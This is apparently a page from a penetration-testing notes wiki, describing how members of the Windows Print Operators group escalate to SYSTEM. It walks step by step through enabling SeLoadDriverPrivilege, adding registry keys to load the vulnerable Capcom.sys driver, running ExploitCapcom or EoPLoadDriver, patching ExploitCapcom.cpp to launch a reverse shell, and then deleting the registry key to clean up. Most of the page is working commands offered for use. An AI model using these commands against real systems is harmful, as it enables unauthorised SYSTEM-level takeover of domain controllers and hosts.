Print Operators

ABOUT

Print Operators is another highly privileged group, which grants its members the SeLoadDriverPrivilege, rights to manage, create, share, and delete printers connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down.

Capcom Driver Abuse

The plan is to use EnableSeLoadDriverPrivilege script to enable SeLoadDriverPrivilege. Then we need to load the Capcom.sys driver, which was used originally as a anti-cheat for Capcom games, but it also have functionality to allow any user to execute shellcode with SYSTEM privileges. Then we make a Registry key and edit it for Capcom.sys to be seen. Then we check it with DriverView . After we verified that info, we are using ExploitCapcom script to get SYSTEM shell.

OR we can change code of ExploitCapcom to make a reverse shell for us (if we have no GUI access).

Check privs

C:\> whoami /priv

EnableSeLoadPrivilege

C:\> .\EnableSeLoadDriverPrivilege.exe

Add Reference to Driver

You need to download Capcom.sys to C:\temp. Issue the commands below to add a reference to this driver under our HKEY_CURRENT_USER tree.

C:\> reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\temp\Capcom.sys"

C:\> reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1

Verify Driver

PS C:\> .\DriverView.exe /stext drivers.txt

PS C:\> cat drivers.txt | Select-String -pattern Capcom

Exploiting

PS C:\> .\ExploitCapcom.exe

Same stuff but automated

C:\> EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\temp\Capcom.sys

PS C:\> .\ExploitCapcom.exe

NO GUI

For that we need to find ExploitCapcom.cpp. change string below and recompile.

B E F O R E : TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");

A F T E R : TCHAR CommandLine[] = TEXT("C:\\ProgramData\\revshell.exe");

Cleanup

For a little clean up we could just delete registry key we made before.

C:\> reg delete HKCU\System\CurrentControlSet\Capcom

PreviousServer Operators NextDnsAdmins

Last updated 1 month ago